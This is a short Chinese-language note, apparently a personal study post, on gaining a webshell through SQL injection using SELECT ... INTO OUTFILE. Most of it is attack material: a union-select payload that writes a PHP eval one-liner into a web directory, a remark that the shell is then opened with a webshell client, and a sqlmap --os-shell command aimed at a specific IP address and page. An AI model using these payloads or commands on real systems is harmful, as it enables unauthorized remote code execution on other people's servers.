今天来说一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT … INTO OUTFILE 这个语句,下面是一个语句的例子:
SELECT * INTO OUTFILE ‘C:\log1.txt’
例如:
?id=1’ union select 1,2,’<?php @eval($_REQUEST[cmd]);?>’ into outfile ‘C:\phpStudy\WWW\502g58de\hahaha.php’ --+
然后菜刀连接就完了
搞不明白一点,1,2会不会也写进去?
sqlmap写webshell命令:
sqlmap -u “http://59.63.200.79:8804/single.php?id=1” --os-shell --batch